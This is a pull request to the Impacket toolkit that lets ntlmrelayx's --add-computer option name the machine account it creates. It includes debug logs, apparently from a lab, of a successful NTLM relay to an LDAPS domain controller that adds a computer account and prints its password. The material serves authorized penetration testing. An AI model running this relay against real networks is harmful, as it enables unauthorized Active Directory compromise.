### PR TITLE
Adds ability to choose computer name when using --add-computer

### DIFF
--- a/.gitignore
+++ b/.gitignore
@@ -23,6 +23,9 @@ var/
 .installed.cfg
 *.egg
 
+Pipfile
+Pipfile.lock
+
 # PyInstaller
 #  Usually these files are written by a python script from a template
 #  before PyInstaller builds the exe, so as to inject date/other infos into it.

--- a/examples/ntlmrelayx.py
+++ b/examples/ntlmrelayx.py
@@ -278,7 +278,7 @@ if __name__ == '__main__':
     ldapoptions.add_argument('--no-acl', action='store_false', required=False, help='Disable ACL attacks')
     ldapoptions.add_argument('--no-validate-privs', action='store_false', required=False, help='Do not attempt to enumerate privileges, assume permissions are granted to escalate a user via ACL attacks')
     ldapoptions.add_argument('--escalate-user', action='store', required=False, help='Escalate privileges of this user instead of creating a new one')
-    ldapoptions.add_argument('--add-computer', action='store_true', required=False, help='Attempt to add a new computer account')
+    ldapoptions.add_argument('--add-computer', action='store', metavar='COMPUTERNAME', required=False, const='Rand', nargs='?', help='Attempt to add a new computer account')
     ldapoptions.add_argument('--delegate-access', action='store_true', required=False, help='Delegate access on relayed computer account to the specified account')
 
     #IMAP options

--- a/impacket/examples/ntlmrelayx/attacks/ldapattack.py
+++ b/impacket/examples/ntlmrelayx/attacks/ldapattack.py
@@ -67,6 +67,7 @@ class LDAPAttack(ProtocolAttack):
     GENERIC_ALL             = 0x000F01FF
 
     def __init__(self, config, LDAPClient, username):
+        self.computerName = '' if config.addcomputer == 'Rand' else config.addcomputer
         ProtocolAttack.__init__(self, config, LDAPClient, username)
 
     def addComputer(self, parent, domainDumper):
@@ -86,8 +87,13 @@ class LDAPAttack(ProtocolAttack):
         domaindn = domainDumper.root
         domain = re.sub(',DC=', '.', domaindn[domaindn.find('DC='):], flags=re.I)[3:]
 
-        # Random computername
-        newComputer = (''.join(random.choice(string.ascii_letters) for _ in range(8)) + '$').upper()
+        computerName = self.computerName
+        if computerName == '':
+            # Random computername
+            newComputer = (''.join(random.choice(string.ascii_letters) for _ in range(8)) + '$').upper()
+        else:
+            newComputer = computerName if computerName.endswith('$') else computerName + '$'
+
         computerHostname = newComputer[:-1]
         newComputerDn = ('CN=%s,%s' % (computerHostname, parent)).encode('utf-8')
 


### PR DESCRIPTION
Enhancement based on https://github.com/SecureAuthCorp/impacket/issues/695 
   
When using --add-computer in an ldap attack via ntlmrelayx:  
-- If a computer name is selected it will create the specified computer name    
-- Without a name selected, uses default (generate computername using randomstring)  

Adding computer, 'Test'
```
(impacket-K-5e16G8) root@ronin:/mnt/hgfs/GitHub/temps/my-imp/impacket# ntlmrelayx.py -debug -t ldaps://192.168.1.100 --add-computer 'Test'
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client SMTP loaded..
[+] Protocol Attack HTTP loaded..
[+] Protocol Attack HTTPS loaded..
[+] Protocol Attack IMAP loaded..
[+] Protocol Attack IMAPS loaded..
[+] Protocol Attack LDAP loaded..
[+] Protocol Attack LDAPS loaded..
[+] Protocol Attack MSSQL loaded..
[+] Protocol Attack SMB loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up HTTP Server

[*] Servers started, waiting for connections
[*] HTTPD: Received connection from 192.168.1.110, attacking target ldaps://192.168.1.100
[*] HTTPD: Client requested path: /
[*] HTTPD: Client requested path: /
[*] Authenticating against ldaps://192.168.1.100 as NAILED\sgomez SUCCEED
{'daemon': True, 'interfaceIp': '', 'listeningPort': 80, 'domainIp': None, 'machineAccount': None, 'machineHashes': None, 'target': <impacket.examples.ntlmrelayx.utils.targetsutils.TargetsProcessor object at 0x7fc6ead73810>, 'mode': 'RELAY', 'redirecthost': None, 'outputFile': None, 'attacks': {'HTTP': <class 'impacket.examples.ntlmrelayx.attacks.httpattack.HTTPAttack'>, 'HTTPS': <class 'impacket.examples.ntlmrelayx.attacks.httpattack.HTTPAttack'>, 'IMAP': <class 'impacket.examples.ntlmrelayx.attacks.imapattack.IMAPAttack'>, 'IMAPS': <class 'impacket.examples.ntlmrelayx.attacks.imapattack.IMAPAttack'>, 'LDAP': <class 'impacket.examples.ntlmrelayx.attacks.ldapattack.LDAPAttack'>, 'LDAPS': <class 'impacket.examples.ntlmrelayx.attacks.ldapattack.LDAPAttack'>, 'MSSQL': <class 'impacket.examples.ntlmrelayx.attacks.mssqlattack.MSSQLAttack'>, 'SMB': <class 'impacket.examples.ntlmrelayx.attacks.smbattack.SMBAttack'>}, 'lootdir': '.', 'randomtargets': False, 'encoding': 'utf-8', 'ipv6': False, 'remove_mic': False, 'serve_wpad': False, 'wpad_host': None, 'wpad_auth_num': None, 'smb2support': False, 'exeFile': None, 'command': None, 'interactive': False, 'enumLocalAdmins': False, 'dumpdomain': True, 'addda': True, 'aclattack': True, 'validateprivs': True, 'escalateuser': None, 'queries': None, 'protocolClients': {'HTTP': <class 'impacket.examples.ntlmrelayx.clients.httprelayclient.HTTPRelayClient'>, 'HTTPS': <class 'impacket.examples.ntlmrelayx.clients.httprelayclient.HTTPSRelayClient'>, 'IMAPS': <class 'impacket.examples.ntlmrelayx.clients.imaprelayclient.IMAPSRelayClient'>, 'IMAP': <class 'impacket.examples.ntlmrelayx.clients.imaprelayclient.IMAPRelayClient'>, 'LDAP': <class 'impacket.examples.ntlmrelayx.clients.ldaprelayclient.LDAPRelayClient'>, 'LDAPS': <class 'impacket.examples.ntlmrelayx.clients.ldaprelayclient.LDAPSRelayClient'>, 'MSSQL': <class 'impacket.examples.ntlmrelayx.clients.mssqlrelayclient.MSSQLRelayClient'>, 'SMB': <class 'impacket.examples.ntlmrelayx.clients.smbrelayclient.SMBRelayClient'>, 'SMTP': <class 'impacket.examples.ntlmrelayx.clients.smtprelayclient.SMTPRelayClient'>}, 'runSocks': False, 'socksServer': None, 'remove_target': False, 'serve_image': None, 'addcomputer': 'Test', 'delegateaccess': False, 'keyword': 'password', 'mailbox': 'INBOX', 'dump_all': False, 'dump_max': 0}
[*] Enumerating relayed user's privileges. This may take a while on large domains
[+] User is a member of: []
[+] User is a member of: [DN: CN=Domain Users,CN=Users,DC=nailed,DC=it - STATUS: Read - READ TIME: 2019-11-18T12:20:27.093924
    distinguishedName: CN=Domain Users,CN=Users,DC=nailed,DC=it
    name: Domain Users
    objectSid: S-1-5-21-3740677972-2905839399-314649620-513
]
[+] New computer info {'dnsHostName': 'Test.nailed.it', 'userAccountControl': 4096, 'servicePrincipalName': ['HOST/Test', 'HOST/Test.nailed.it', 'RestrictedKrbHost/Test', 'RestrictedKrbHost/Test.nailed.it'], 'sAMAccountName': 'Test$', 'unicodePwd': b'"\x00`\x00M\x00E\x00w\x00e\x00|\x00q\x00*\x00N\x00d\x00X\x00N\x008\x00Q\x00~\x00"\x00'}
[*] Attempting to create computer in: CN=Computers,DC=nailed,DC=it
[*] Adding new computer with username: Test$ and password: `MEwe|q*NdXN8Q~ result: OK
```
  
Default Behavior:  
  
```
(impacket-K-5e16G8) root@ronin:/mnt/hgfs/GitHub/temps/my-imp/impacket# ntlmrelayx.py -debug -t ldaps://192.168.1.100 --add-computer
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client SMTP loaded..
[+] Protocol Attack HTTP loaded..
[+] Protocol Attack HTTPS loaded..
[+] Protocol Attack IMAP loaded..
[+] Protocol Attack IMAPS loaded..
[+] Protocol Attack LDAP loaded..
[+] Protocol Attack LDAPS loaded..
[+] Protocol Attack MSSQL loaded..
[+] Protocol Attack SMB loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server

[*] Setting up HTTP Server
[*] Servers started, waiting for connections
[*] HTTPD: Received connection from 192.168.1.110, attacking target ldaps://192.168.1.100
[*] HTTPD: Client requested path: /
[*] HTTPD: Client requested path: /
[*] Authenticating against ldaps://192.168.1.100 as NAILED\sgomez SUCCEED
{'daemon': True, 'interfaceIp': '', 'listeningPort': 80, 'domainIp': None, 'machineAccount': None, 'machineHashes': None, 'target': <impacket.examples.ntlmrelayx.utils.targetsutils.TargetsProcessor object at 0x7fce443e7210>, 'mode': 'RELAY', 'redirecthost': None, 'outputFile': None, 'attacks': {'HTTP': <class 'impacket.examples.ntlmrelayx.attacks.httpattack.HTTPAttack'>, 'HTTPS': <class 'impacket.examples.ntlmrelayx.attacks.httpattack.HTTPAttack'>, 'IMAP': <class 'impacket.examples.ntlmrelayx.attacks.imapattack.IMAPAttack'>, 'IMAPS': <class 'impacket.examples.ntlmrelayx.attacks.imapattack.IMAPAttack'>, 'LDAP': <class 'impacket.examples.ntlmrelayx.attacks.ldapattack.LDAPAttack'>, 'LDAPS': <class 'impacket.examples.ntlmrelayx.attacks.ldapattack.LDAPAttack'>, 'MSSQL': <class 'impacket.examples.ntlmrelayx.attacks.mssqlattack.MSSQLAttack'>, 'SMB': <class 'impacket.examples.ntlmrelayx.attacks.smbattack.SMBAttack'>}, 'lootdir': '.', 'randomtargets': False, 'encoding': 'utf-8', 'ipv6': False, 'remove_mic': False, 'serve_wpad': False, 'wpad_host': None, 'wpad_auth_num': None, 'smb2support': False, 'exeFile': None, 'command': None, 'interactive': False, 'enumLocalAdmins': False, 'dumpdomain': True, 'addda': True, 'aclattack': True, 'validateprivs': True, 'escalateuser': None, 'queries': None, 'protocolClients': {'HTTPS': <class 'impacket.examples.ntlmrelayx.clients.httprelayclient.HTTPSRelayClient'>, 'HTTP': <class 'impacket.examples.ntlmrelayx.clients.httprelayclient.HTTPRelayClient'>, 'IMAP': <class 'impacket.examples.ntlmrelayx.clients.imaprelayclient.IMAPRelayClient'>, 'IMAPS': <class 'impacket.examples.ntlmrelayx.clients.imaprelayclient.IMAPSRelayClient'>, 'LDAPS': <class 'impacket.examples.ntlmrelayx.clients.ldaprelayclient.LDAPSRelayClient'>, 'LDAP': <class 'impacket.examples.ntlmrelayx.clients.ldaprelayclient.LDAPRelayClient'>, 'MSSQL': <class 'impacket.examples.ntlmrelayx.clients.mssqlrelayclient.MSSQLRelayClient'>, 'SMB': <class 'impacket.examples.ntlmrelayx.clients.smbrelayclient.SMBRelayClient'>, 'SMTP': <class 'impacket.examples.ntlmrelayx.clients.smtprelayclient.SMTPRelayClient'>}, 'runSocks': False, 'socksServer': None, 'remove_target': False, 'serve_image': None, 'addcomputer': 'Rand', 'delegateaccess': False, 'keyword': 'password', 'mailbox': 'INBOX', 'dump_all': False, 'dump_max': 0}
[*] Enumerating relayed user's privileges. This may take a while on large domains
[+] User is a member of: []
[+] User is a member of: [DN: CN=Domain Users,CN=Users,DC=nailed,DC=it - STATUS: Read - READ TIME: 2019-11-18T12:20:05.227917
    distinguishedName: CN=Domain Users,CN=Users,DC=nailed,DC=it
    name: Domain Users
    objectSid: S-1-5-21-3740677972-2905839399-314649620-513
]
[+] New computer info {'dnsHostName': 'JZTDBQCZ.nailed.it', 'userAccountControl': 4096, 'servicePrincipalName': ['HOST/JZTDBQCZ', 'HOST/JZTDBQCZ.nailed.it', 'RestrictedKrbHost/JZTDBQCZ', 'RestrictedKrbHost/JZTDBQCZ.nailed.it'], 'sAMAccountName': 'JZTDBQCZ$', 'unicodePwd': b'"\x00S\x00h\x006\x00+\x00K\x00v\x00?\x00s\x00h\x00c\x00I\x00x\x00E\x006\x00R\x00"\x00'}
[*] Attempting to create computer in: CN=Computers,DC=nailed,DC=it
[*] Adding new computer with username: JZTDBQCZ$ and password: Sh6+Kv?shcIxE6R result: OK
```
  
  
also added pipfile and piplock to .gitignore (although impacket may want to commit such files at some point)  
